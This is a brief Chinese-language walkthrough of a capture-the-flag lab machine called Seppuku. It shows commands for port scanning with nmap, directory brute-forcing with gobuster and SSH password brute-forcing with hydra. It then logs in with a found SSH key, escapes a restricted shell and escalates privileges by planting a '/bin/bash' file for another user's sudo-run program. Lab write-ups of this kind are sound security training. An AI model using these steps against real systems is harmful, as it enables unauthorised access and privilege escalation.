使用nmap去发现开放的ip 端口目标:192.168.3.133
sudo nmap -p- 192.168.3.133

在这一步得到密码和ssh密钥,还有一个hostname
那么利用hydra工具尝试获取hostname对应着哪个密码
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.3.133:7601


把获取到的密码保存成passwd.txt文档
hydra -l seppuku -P passwd.txt 192.168.3.133 ssh

利用已经得到的ssh账号密码登录

ls -all 查看当前路径存在文件包括隐藏路径


当前用户的sudo -l并没有可执行的程序,探索Linux得到此靶机不仅仅有一个用户,逐个切换用户看看在当前用户目录下的密码的作用 su samurai可行,而且具有root权限的可执行程序,但是属于第三用户目录,利用在信息收集的阶段得到的ssh密钥登录

ssh -i ../sshkey tanto@192.168.3.133 -t "bash --noprofile"
tanto@seppuku:~$ mkdir .cgi_bin
tanto@seppuku:~$ cd .cgi_bin/
tanto@seppuku:~/.cgi_bin$ echo "/bin/bash" > bin
tanto@seppuku:~/.cgi_bin$ chmod 777 bin
tanto@seppuku:~/.cgi_bin$ ls -la
利用第三用户写入程序,最后是利用第二用户执行
要点: Linux用户切换
,
















